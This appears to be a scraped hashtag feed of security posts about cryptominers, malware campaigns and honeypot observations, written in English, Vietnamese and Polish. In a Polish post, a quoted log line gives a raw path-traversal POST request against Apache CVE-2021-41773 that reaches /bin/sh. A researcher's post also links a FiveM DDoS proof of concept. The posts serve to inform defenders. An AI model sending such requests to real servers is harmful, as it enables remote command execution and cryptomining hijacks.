Hackread.comWatch out as new .NET AOT malware hides its code as a black box, making detection far harder while delivering Rhadamanthys infostealer and crypto miner.
Read: https://hackread.com/net-aot-malware-code-black-box-evade-detection/
Andrew 🌻 Brandt 🐇I had a chance last week to chat with Benjamin Read of #Wiz. Last month, Read and other members of his team published a deep dive into the #React2Shell
(CVE-2025-55182) vulnerability, and I was curious to see what has been hitting my honeypot, so I took a closer look.
This is doing some weird stuff, friends.
As is normally the case with exploits targeting internet-facing devices, once the exploit becomes known, it ends up in the automated scanners used by threat actors and security researchers. What I've seen over the past week is a combination of both.
In just a few hours of operation, I identified a small number of source IP addresses exploiting React2Shell by pointing the vulnerable system at URLs hosting BASH scripts. These scripts are really familiar to anyone who routinely looks at honeypot data - they contain a series of commands that pull down and execute malicious payloads.
And as I've seen in the past, some of these payloads use racially inflammatory language in their malware. It's weird and gross, but unfortunately, really common.
But while most of these payloads were "the usual suspects" - remote shells, cryptocurrency miners - there was one payload that stuck out.
It's an exploit file, based on this proof-of-concept [https://github.com/iotwar/FIVEM-POC/blob/main/fivem-poc.py] designed to DDoS a modded server running "FiveM," a popular version of the game Grand Theft Auto V.
Let that one sink in: among the earliest adopters of a brand new exploit are...people trying to mess with other people's online game servers.
I've long said that exploits like these are the canaries in the datacenter coal mine. After all, if an attacker can force your server to run a cryptominer (or a game DDoS tool), they can force it to run far more malicious code.
I guess someone, or a group of someones, just want to ruin everyone's good time, no matter how or what form that takes. And they'll do it in the most offensive way possible.
Anyway, patch your servers, please, if only to stick it to these people who want to be the reason we can't have nice things.
#PoC #exploit #CVE_2025_55182 #DDoS #FiveM #REACT #Bash #cryptominer #malware
Reddit Tech VN BotVPS của tôi liên tục bị nhiễm cryptominer ngay sau khi cài lại Ubuntu 24.04. Bots tấn công mật khẩu root trong khoảng thời gian từ lúc khởi động đến khi chạy script bảo mật bằng Ansible. Triệu chứng: CPU 100%, tiến trình gây nghi ngờ (XMRig), nhật ký hệ thống bị xóa. Câu hỏi: Mật khẩu 50 ký tự có đủ mạnh? Làm thế nào để khóa máy chủ trong giai đoạn cài đặt? #securitytips #cryptomining #Ubuntu #VPS
Tags: #VPSan ninh #cryptominer #Ubuntu2404 #Ansible #BruteForce #Kinhnghiệmthựctế #Hethongdichvu
Hacker NewsCrypto Miner in hotio/qbittorrent
https://apogliaghi.com/2025/09/crypto-miner-in-hotio/qbittorrent/
#HackerNews #CryptoMiner #hotio #qbittorrent #cryptocurrency #technology
A Linux cryptominer has been quietly spreading malware for years by hijacking legit websites with SSL certs.
🔗 https://hackread.com/linux-cryptominer-using-legit-sites-to-spread-malware/
Wulfy—Speaker to the machinesFinally completed my rebuild of my #Grafana #prometheus #vps stack.
The old one was hosed in a 3 month battle with a #cryptominer
It was #docker but they kept fucking the Prometheus container.
I rebuild everything from scratch. The panels are integrated into a single JSON file, rather than in libraries.
The stack is now #podman. Rootless execution.
But I couldn't get it to get #cadvisor to feed it.
So I got a dodgy scraper script.
But even with nice, it loads the low tier VPS to 14%
🧿🪬🍄🌈🎮💻🚲🥓🎃💀🏴🛻🇺🇸Every #appliance that's job is to get hot should be a #cryptoMiner or a #heatPump
#electronics #technology #bitcoin #cryptocurrency #crypto #appliances #home
🐦🔥nemo™🐦⬛ 🇺🇦🍉Cybercriminals are blackmailing YouTubers with fake copyright claims! 😱 They're threatening creators into distributing malware disguised as download links. A trojanized program installs a cryptominer. ⚠️ Be careful what you download! More info: https://www.techradar.com/pro/security/youtubers-targeted-by-blackmail-campaign-to-promote-malware-on-their-channels #cybersecurity #malware #youtube #cryptominer #newz
Patryk KrawaczyńskiCVE-2021-41773 oraz CVE-2021-42013 kończące się kopaniem krypto przez RedTail ( https://nfsec.pl/ai/6597 ) #cryptominer #botnet #redtail #linux #security #twittermigration
NF.sec – Bezpieczeństwo systemu Linux - CVE-2021-41773 oraz CVE-2021-42013 kończące się kopaniem krypto przez RedTail
W sieci wciąż krążą automaty szukające podatnych na path traversal oraz zdalne wykonanie poleceń serwerów HTTP Apache. Na przykład z dwóch chińskich adresów IP: 117.184.158.27 oraz 124.165.198.25 możemy zostać uraczeni następującym żądaniem typu POST: POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 accept: */* host: 1.2.3.4:443 upgrade-insecure-requests: 1 user-agent: Custom-AsyncHttpClient content-length: 109 content-type: text/plain x-http-version: 1.1 x-remote-port: 52454 x-forwarded-for: 124.165.198.25 […]
RedPacket SecurityFake Job Offers from CrowdStrike Used by Cybercriminals to Distribute Cryptominer - https://www.redpacketsecurity.com/cybercriminals-use-fake-crowdstrike-job-offers-to-distribute-cryptominer/
